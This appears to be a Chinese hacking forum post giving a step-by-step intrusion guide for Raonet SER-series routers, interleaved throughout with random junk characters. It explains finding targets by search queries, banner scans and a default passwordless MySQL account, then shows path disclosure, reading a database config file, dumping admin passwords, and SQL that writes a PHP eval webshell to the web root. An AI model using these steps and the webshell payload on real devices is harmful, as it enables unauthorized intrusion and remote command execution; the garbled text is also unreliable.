寻找存在漏洞的路由器方法:
* i# L) ^4 \4 h9 R: P; Y8 `- n* K
1:google搜索'Raonet Subscriber Ethernet Router'' V+ K6 L( O0 n, t% ?9 \7 N9 m
, O6 F `5 l5 H% T* W2 s0 Y9 o2 C
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr20016 i5 X/ F+ P) R3 W( c- Z
2 \& p5 H7 M; {; j
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。4 s7 N! r& g! e2 E1 L! a4 s& `
7 o" L4 F m2 f B6 j2 [+ D//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
1 \7 n% h+ _$ J& R- z: E4 |( A3 d ^, A
) \- e, Z4 X- ~0 g! c! j+ N& ?3 H( K) D
入侵步骤:. D0 O* w7 m0 a$ ^0 `+ |& \
V& f- n% a4 ^% p
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
0 z& K0 a, |# q6 f$ H% l. ^8 M; u- X/ B b. P: a
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc! \$ _' I+ p' Y. L' b0 L* J2 _
3:得到密码后连接,查看GUI管理密码:: |) `2 |4 J/ c2 \3 M: _4 a$ B
use ser_500
% F& L7 F6 \* r- ~select id,passwd from user;/ @9 B- j7 c" q, W: p9 U
4:通过数据库写入webshell,执行命令:
5 X6 \1 |! |8 D/ `! o# o3 uuse mysql;
& G; s% x4 ?/ P- o8 L- ?& w h- Gcreate table ok(cmd TEXT);
4 i1 ^+ |1 F4 A O+ ~2 ?insert into ok values("<?php @eval($_POST[cmd])?>");* h% B2 t( w% T) d- K
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";+ S4 z, A/ Z! P: e& G1 P! e+ N0 {6 b
drop table ok;
$ J" ] ?( v; j' R9 v9 S/ B$ k' E+ M" h' E) e. E5 u
5:连接后门shell.php ' D. f5 k/ ^4 c) `
) Z- v! |- g! \9 r) u
6. 搞定!1 V* q+ u5 o9 h$ y6 Y' m
. J- g) j( S4 h' f& s |